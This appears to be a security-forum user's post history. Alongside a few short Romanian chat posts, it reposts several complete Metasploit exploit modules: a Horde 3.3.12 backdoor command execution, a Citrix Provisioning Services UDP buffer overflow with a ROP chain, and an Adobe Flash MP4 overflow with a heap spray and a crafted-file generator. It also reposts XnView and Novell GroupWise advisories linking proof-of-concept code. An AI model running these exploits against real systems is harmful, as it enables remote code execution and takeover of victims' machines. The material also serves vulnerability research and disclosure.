The_Arhitect
-
Posts
425 -
Joined
-
Last visited
-
Days Won
2
Posts posted by The_Arhitect
-
-
Informatica 1 la 1 (101)
Criptografie
Designul si analiza Algoritmilor
Securitatea Computerelor
La astea m-am inscris, interesant
-
Grija mare cu juridica.
-
-
Horde 3.3.12 Backdoor Arbitrary PHP Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Horde 3.3.12 Backdoor Arbitrary PHP Code Execution',
'Description' => %q{
This module exploits an arbitrary PHP code execution vulnerability introduced
as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.
},
'Author' => [
'Eric Romang', # first public PoC
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0209'],
[ 'URL', 'http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155' ],
[ 'URL', 'http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/' ]
],
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x0a\x0d",
'DisableNops' => true,
'Space' => 4096,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Platform' => [ 'unix', 'linux' ],
'Arch' => ARCH_CMD,
'DefaultTarget' => 0,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Feb 13 2012'
))
register_options(
[
OptString.new('URI', [true, "Path to Horde installation", "/horde"]),
OptString.new('APP', [true, "App parameter required by javascript.php (must be active)", "horde"]),
], self.class)
end
def exploit
# Make sure the URI begins with a slash
uri = datastore['URI']
if uri[0,1] != '/'
uri = '/' + uri
end
# Make sure the URI ends without a slash, because it's already part of the URI
if uri[-1, 1] == '/'
uri = uri[0, uri.length-1]
end
function = "passthru"
key = Rex::Text.rand_text_alpha(6)
arguments = "echo #{key}`"+payload.raw+"`#{key}"
res = send_request_cgi({
'uri' => uri + "/services/javascript.php",
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "app="+datastore['APP']+"&file=open_calendar.js",
'headers' =>
{
'Cookie' => "href="+function+":"+arguments,
'Connection' => 'Close',
}
}) #default timeout, we don't care about the response
if (res)
print_status("The server returned: #{res.code} #{res.message}")
end
resp = res.body.split(key)
if resp and resp[1]
print_status(resp[1])
else
print_error("No response found")
end
handler
end
end -
XnView <= 1.98.5 Multiple Vulnerabilities
#######################################################################
Luigi Auriemma
Application: XnView
http://www.xnview.com
Versions: <= 1.98.5
Platforms: Windows
Bugs: A] integer overflow in width/height calculation
B] jpeg heap overflow
C] ICO heap overflow
D] PCX heap overflow
E] FLI heap overflow
Exploitation: via file
Date: 16 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
"XnView is an efficient multimedia viewer, browser and converter
supporting more than 400 graphics formats"
#######################################################################
=======
2) Bugs
=======
Note that this program has been tested only for a quick blind
experiment of some minutes so this advisory is not much completed or
detailed.
-----------------------------------------------
A] integer overflow in width/height calculation
-----------------------------------------------
The function that handles the width/height of the screen used for any
file format if affected by some integer overflow vulnerabilities:
0047DB20 /$ 83EC 18 SUB ESP,18
...
0047DB78 |> 8B4424 38 MOV EAX,DWORD PTR SS:[ESP+38]
0047DB7C |. 8B4C24 3C MOV ECX,DWORD PTR SS:[ESP+3C]
0047DB80 |. 8B6C24 34 MOV EBP,DWORD PTR SS:[ESP+34]
0047DB84 |. 8947 08 MOV DWORD PTR DS:[EDI+8],EAX
0047DB87 |. 894F 0C MOV DWORD PTR DS:[EDI+C],ECX
0047DB8A |. 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
0047DB8D |. 8957 10 MOV DWORD PTR DS:[EDI+10],EDX
0047DB90 |. 8B4D 04 MOV ECX,DWORD PTR SS:[EBP+4]
0047DB93 |. 8D1485 00000000 LEA EDX,DWORD PTR DS:[EAX*4] ; integer overflow
0047DB9A |. 894F 14 MOV DWORD PTR DS:[EDI+14],ECX
0047DB9D |. 52 PUSH EDX
0047DB9E |. E8 B8311400 CALL xnview.005C0D5B ; malloc
0047DBA3 |. 8907 MOV DWORD PTR DS:[EDI],EAX
0047DBA5 |. 8B47 0C MOV EAX,DWORD PTR DS:[EDI+C]
0047DBA8 |. C1E0 02 SHL EAX,2 ; integer overflow
0047DBAB |. 50 PUSH EAX
0047DBAC |. E8 AA311400 CALL xnview.005C0D5B ; malloc
0047DBB1 |. 8B4F 08 MOV ECX,DWORD PTR DS:[EDI+8]
0047DBB4 |. 8947 04 MOV DWORD PTR DS:[EDI+4],EAX
0047DBB7 |. 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
0047DBBA |. 83C4 08 ADD ESP,8
0047DBBD |. 3BC8 CMP ECX,EAX
0047DBBF |. 75 51 JNZ SHORT xnview.0047DC12
0047DBC1 |. 8B57 0C MOV EDX,DWORD PTR DS:[EDI+C]
0047DBC4 |. 8B45 04 MOV EAX,DWORD PTR SS:[EBP+4]
0047DBC7 |. 3BD0 CMP EDX,EAX
0047DBC9 |. 75 47 JNZ SHORT xnview.0047DC12
0047DBCB |. 33C0 XOR EAX,EAX
0047DBCD |. 3BCE CMP ECX,ESI
0047DBCF |. 7E 16 JLE SHORT xnview.0047DBE7
0047DBD1 |> 33C9 /XOR ECX,ECX ; write loop
0047DBD3 |. 8B17 |MOV EDX,DWORD PTR DS:[EDI]
0047DBD5 |. 66:8B4D 0E |MOV CX,WORD PTR SS:[EBP+E]
0047DBD9 |. 0FAFC8 |IMUL ECX,EAX
0047DBDC |. 890C82 |MOV DWORD PTR DS:[EDX+EAX*4],ECX
0047DBDF |. 8B4F 08 |MOV ECX,DWORD PTR DS:[EDI+8]
0047DBE2 |. 40 |INC EAX
0047DBE3 |. 3BC1 |CMP EAX,ECX
0047DBE5 |.^7C EA \JL SHORT xnview.0047DBD1
0047DBE7 |> 8B4F 0C MOV ECX,DWORD PTR DS:[EDI+C]
0047DBEA |. 33C0 XOR EAX,EAX
0047DBEC |. 3BCE CMP ECX,ESI
0047DBEE |. 0F8E B6000000 JLE xnview.0047DCAA
0047DBF4 |> 8B4D 08 /MOV ECX,DWORD PTR SS:[EBP+8] ; write loop
0047DBF7 |. 8B75 28 |MOV ESI,DWORD PTR SS:[EBP+28]
0047DBFA |. 0FAFC8 |IMUL ECX,EAX
0047DBFD |. 8B57 04 |MOV EDX,DWORD PTR DS:[EDI+4]
0047DC00 |. 03CE |ADD ECX,ESI
0047DC02 |. 890C82 |MOV DWORD PTR DS:[EDX+EAX*4],ECX
0047DC05 |. 8B4F 0C |MOV ECX,DWORD PTR DS:[EDI+C]
0047DC08 |. 40 |INC EAX
0047DC09 |. 3BC1 |CMP EAX,ECX
0047DC0B |.^7C E7 \JL SHORT xnview.0047DBF4
0047DC0D |. E9 98000000 JMP xnview.0047DCAA
The content of the 32bit value to write depends by the file format and
the continuation of the execution after the exception may depend by the
system in use (more chances using Windows 7).
---------------------
B] jpeg heap overflow
---------------------
Heap overflow during the handling of the "Samples per Line" in the
Baseline DCT header:
006E1E5B > 8B7424 3C MOV ESI,DWORD PTR SS:[ESP+3C]
006E1E5F . 8B6C24 14 MOV EBP,DWORD PTR SS:[ESP+14]
006E1E63 > 33DB XOR EBX,EBX
006E1E65 . 83C1 03 ADD ECX,3
006E1E68 . 8A1C06 MOV BL,BYTE PTR DS:[ESI+EAX]
006E1E6B . 8BF3 MOV ESI,EBX
006E1E6D . 33DB XOR EBX,EBX
006E1E6F . 8A18 MOV BL,BYTE PTR DS:[EAX]
006E1E71 . 8BFB MOV EDI,EBX
006E1E73 . 33DB XOR EBX,EBX
006E1E75 . 8A1C28 MOV BL,BYTE PTR DS:[EAX+EBP]
006E1E78 . 8BEB MOV EBP,EBX
006E1E7A . 8B5C24 18 MOV EBX,DWORD PTR SS:[ESP+18]
006E1E7E . 8B1CAB MOV EBX,DWORD PTR DS:[EBX+EBP*4]
006E1E81 . 03DE ADD EBX,ESI
006E1E83 . 8A1413 MOV DL,BYTE PTR DS:[EBX+EDX]
006E1E86 . 8851 FD MOV BYTE PTR DS:[ECX-3],DL
006E1E89 . 8B5424 1C MOV EDX,DWORD PTR SS:[ESP+1C]
006E1E8D . 8B1CBA MOV EBX,DWORD PTR DS:[EDX+EDI*4]
006E1E90 . 8B5424 20 MOV EDX,DWORD PTR SS:[ESP+20]
006E1E94 . 031CAA ADD EBX,DWORD PTR DS:[EDX+EBP*4]
006E1E97 . 8B5424 24 MOV EDX,DWORD PTR SS:[ESP+24]
006E1E9B . C1FB 10 SAR EBX,10
006E1E9E . 03DE ADD EBX,ESI
006E1EA0 . 8A1C13 MOV BL,BYTE PTR DS:[EBX+EDX]
006E1EA3 . 8859 FE MOV BYTE PTR DS:[ECX-2],BL
006E1EA6 . 8B5C24 28 MOV EBX,DWORD PTR SS:[ESP+28]
006E1EAA . 8B3CBB MOV EDI,DWORD PTR DS:[EBX+EDI*4]
006E1EAD . 03FE ADD EDI,ESI
006E1EAF . 8B7424 34 MOV ESI,DWORD PTR SS:[ESP+34]
006E1EB3 . 40 INC EAX
006E1EB4 . 4E DEC ESI
006E1EB5 . 8A1C17 MOV BL,BYTE PTR DS:[EDI+EDX]
006E1EB8 . 897424 34 MOV DWORD PTR SS:[ESP+34],ESI
006E1EBC . 8859 FF MOV BYTE PTR DS:[ECX-1],BL
006E1EBF .^75 9A JNZ SHORT xnview.006E1E5B
--------------------
C] ICO heap overflow
--------------------
Heap overflow during the handling of an ICO file with a smaller number
of bits per pixels than how much specified in the main header.
--------------------
D] PCX heap overflow
--------------------
Heap overflow in the handling of the PCX files.
The provided proof-of-concept should result in EIP 0x61616161.
--------------------
E] FLI heap overflow
--------------------
Heap overflow in the handling of the frames in the FLI files.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/xnview_1.zip
http://www.exploit-db.com/sploits/18491.zip
#######################################################################
======
4) Fix
======
No fix.
####################################################################### -
Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption
#######################################################################
Luigi Auriemma
Application: Novell GroupWise Messenger
http://www.novell.com/products/groupwise/
Versions: <= 2.1.0
Platforms: Windows, Linux, NetWare
Bug: write4
Exploitation: remote, versus server
Date: 16 Feb 2012 (found 10 May 2011)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Check vendor's homepage and version because this is an old advisory.
#######################################################################
======
2) Bug
======
nmma.exe is a service running on port 8300.
The protocol is composed by fields that have particular types, for
example 10 for strings or 8 for integers and so on like any RPC
protocol.
Through the "createsearch" command sent from a valid account and a type
9 value is possible to write a 0x00000000 in an arbitrary memory
location:
00496E2A |> 8B5D 0C /MOV EBX,DWORD PTR SS:[EBP+C]
00496E2D |> 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8]
00496E30 |. 8A47 06 |MOV AL,BYTE PTR DS:[EDI+6]
00496E33 |. 81E1 FFFF0000 |AND ECX,0FFFF
00496E39 |. 3C 02 |CMP AL,2
00496E3B |. 8B5C8B 04 |MOV EBX,DWORD PTR DS:[EBX+ECX*4+4]
...
00496F3A |. C703 00000000 |MOV DWORD PTR DS:[EBX],0 ; EBX is controlled
00496F40 |. 83C3 04 |ADD EBX,4
00496F43 |. 53 |PUSH EBX
00496F44 |. 6A 20 |PUSH 20
00496F46 |. E8 5541F9FF |CALL nmma.0042B0A0
Seems that this vulnerability can be reached only with a valid account.
In my PoC I have used a pre-build admin::adminpass account so remember
to change the NM_A_PARM1 field if you want to use another one.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/nmma_x.zip
http://www.exploit-db.com/sploits/nmma_x.zip
nmma_x 3 SERVER
#######################################################################
======
4) Fix
======
No fix.
#######################################################################Sursa: Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption
-
E veche faza ma.
-
Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow
##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in the Citrix Provisioning Services
5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the
6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,
Windows 7, and Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AbdulAziz Hariri', # Initial discovery via ZDI
'alino <26alino[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
['BID', '49803'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-009'],
['URL', 'http://support.citrix.com/article/CTX130846']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'BadChars' => "\x00",
'EncoderOptions' => {'BufferRegister'=>'ECX'},
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Citrix Provisioning Services 5.6 SP1',
{
'Offset' => 2012,
'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Nov 04 2011', #CTX130846 creation date
'DefaultTarget' => 0))
register_options([Opt::RPORT(6905)], self.class)
end
def exploit
packet = "\x00\x00\x02\x40" # DATA MSG
packet << rand_text_alpha_upper(18)
packet << "\x00\x00\x00\x00" # Length
packet << rand_text_alpha_upper(target['Offset'])
packet << [target.ret].pack('V')
rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe
rop_gadgets =
[
0x0045b141, # POP EAX; RETN streamprocess.exe
0x1009a1bc, # VirtualProtect()
0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe
0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe
0x004ad0cf, # POP EBP; RETN streamprocess.exe
0x00455d9d, # PUSH ESP; RETN streamprocess.exe
0x00497f5a, # POP EAX; RETN streamprocess.exe
0xfffff9d0, # dwSize
0x00447669, # NEG EAX; RETN streamprocess.exe
0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe
0x00426305, # POP ECX; RETN streamprocess.exe
0x00671fb9, # lpflOldProtect
0x004e41e6, # POP EDI; RETN streamprocess.exe
0x0040f004, # RETN streamprocess.exe
0x00495c05, # POP EAX; RETN streamprocess.exe
0xffffffc0, # flNewProtect
0x0042c79a, # NEG EAX; RETN streamprocess.exe
0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe
0x0045c1fa, # POP EAX; RETN streamprocess.exe
0x90909090, # NOP
0x00435bbe, # PUSHAD; RETN streamprocess.exe
].pack("V*")
packet[258, rop_nop.length] = rop_nop
packet[410, rop_gadgets.length] = rop_gadgets
packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff"
packet[504, payload.encoded.length] = payload.encoded
print_status("Trying target #{target.name}...")
connect_udp
udp_sock.put(packet)
handler
disconnect_udp
end
endSursa: Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow
-
Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
component. When processing a MP4 file (specifically the Sequence Parameter Set),
Flash will see if pic_order_cnt_type is equal to 1, which sets the
num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
offset_for_ref_frame on the stack, which allows arbitrary remote code execution
under the context of the user. Numerous reports also indicate that this
vulnerability has been exploited in the wild.
Please note that the exploit requires a SWF media player in order to trigger
the bug, which currently isn't included in the framework. However, software such
as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Gavrun', #RCA
'Abysssec', #PoC
'sinn3r' #Metasploit
],
'References' =>
[
[ 'CVE', '2011-2140' ],
[ 'BID', '49083' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ],
[ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
[ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ],
[ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'ExitFunction' => "seh",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on
[ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 9 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1]
elsif agent =~ /MSIE 7/
return targets[2]
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return
end
# The SWF requests our MP4 trigger
if request.uri =~ /\.mp4$/
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
#print_error("Sorry, not sending you the mp4 for now")
#send_not_found(cli)
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
return
end
# Set payload depending on target
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
JS
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true?=video.jpg&file=#{mp4_uri}"
html = %Q|
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
<param name="movie" value="#{swf_uri}">
</object>
</body>
</html>
|
html = html.gsub(/^\t\t/, '')
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@mp4 = create_mp4
super
end
def create_mp4
ftypAtom = "\x00\x00\x00\x20" #Size
ftypAtom << "ftypisom"
ftypAtom << "\x00\x00\x02\x00"
ftypAtom << "isomiso2avc1mp41"
mdatAtom = "\x00\x00\x00\x10" #Size
mdatAtom << "mdat"
mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"
moovAtom1 = "\x00\x00\x08\x83" #Size
moovAtom1 << "moov" #Move header box header
moovAtom1 << "\x00\x00\x00"
moovAtom1 << "lmvhd" # Type
moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x03\xE8" # Time scale
moovAtom1 << "\x00\x00\x2F\x80" # Duration
moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"
moovAtom1 << "trak" # Track box header
moovAtom1 << "\x00\x00\x00\x5C"
moovAtom1 << "tkhd"
moovAtom1 << "\x00\x00\x00\x0F"
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"
moovAtom1 << "rmdia"
moovAtom1 << "\x00\x00\x00\x20" # Size
moovAtom1 << "mdhd" # Media header box
moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x00\x01" # Time scale
moovAtom1 << "\x00\x00\x00\x0C" # Duration
moovAtom1 << "\x55\xC4\x00\x00"
moovAtom1 << "\x00\x00\x00\x2D" # Size
moovAtom1 << "hdlr" # Handler Reference header
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "vide" # Handler type
moovAtom1 << "\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "VideoHandler" # Handler name
moovAtom1 << "\x00\x00\x00\x02\x1D"
moovAtom1 << "minf"
moovAtom1 << "\x00\x00\x00\x14"
moovAtom1 << "vmhd"
moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"
moovAtom1 << "dinf" # Data information box header
moovAtom1 << "\x00\x00\x00\x1c"
moovAtom1 << "dref" # Data reference box
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
moovAtom1 << "\x00\x00\x00\x0C" # Size
moovAtom1 << "url " # Data entry URL box
moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags
moovAtom1 << "\x00\x00\x09\xDD" # Size
moovAtom1 << "stbl"
moovAtom1 << "\x00\x00\x08\x99"
moovAtom1 << "stsd"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
moovAtom1 << "\x00\x00\x08\x89" # Size
moovAtom1 << "avc1"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x01\x42" # Width
moovAtom1 << "\x01\x42" # Height
moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x18" # Depth
moovAtom1 << "\xFF\xFF"
moovAtom1 << "\x00\x00\x08\x33" # Size
moovAtom1 << "avcC"
moovAtom1 << "\x01" # Config version
moovAtom1 << "\x64" # Avc profile indication
moovAtom1 << "\x00" # Compatibility
moovAtom1 << "\x15" # Avc level indication
moovAtom1 << "\xFF\xE1"
# Although the fields have different values, they all become 0x0c0c0c0c
# in memory.
cycle = "\x00\x00\x00"
cycle << "\x30\x30\x30\x30" #6th
cycle << "\x00\x00\x00"
cycle << "\x18\x18\x18\x18" #7th
cycle << "\x00\x00\x00"
cycle << "\x0c\x0c\x0c\x0c" #8th
cycle << "\x00\x00\x00"
cycle << "\x06\x06\x06\x06" #1st
cycle << "\x00\x00\x00"
cycle << "\x03\x03\x03\x03"
cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"
cycle << "\xc0\xc0\xc0\xc0" # 4th
cycle << "\x00\x00\x00"
cycle << "\x60\x60\x60\x60"
spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"
spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"
spsunit << cycle * 35
spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"
moovAtom2 = "\x00\x00\x00\x18"
moovAtom2 << "stts"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"
moovAtom2 << "\x00\x00\x00\x14"
moovAtom2 << "stss"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
moovAtom2 << "pctts"
moovAtom2 << "\x00\x00\x00\x00\x00\x00"
moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"
moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"
moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"
moovAtom2 << "\x00\x00\x00\x1C"
moovAtom2 << "stsc"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"
moovAtom2 << "\x00\x00\x00\x44"
moovAtom2 << "stsz"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"
moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"
moovAtom2 << "\x00\x00\x00\x40"
moovAtom2 << "stco"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"
moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"
moovAtom = moovAtom1 + spsunit + moovAtom2
m = ftypAtom + mdatAtom + moovAtom
return m
end
end
=begin
C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx
Flash10u+0x5b4e8:
Missing image name, possible paged-out or corrupt data.
1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d
0:008> !exchain
020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)
ECX points to 0x0c0c0c0c at the time of the crash:
0:008> r
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
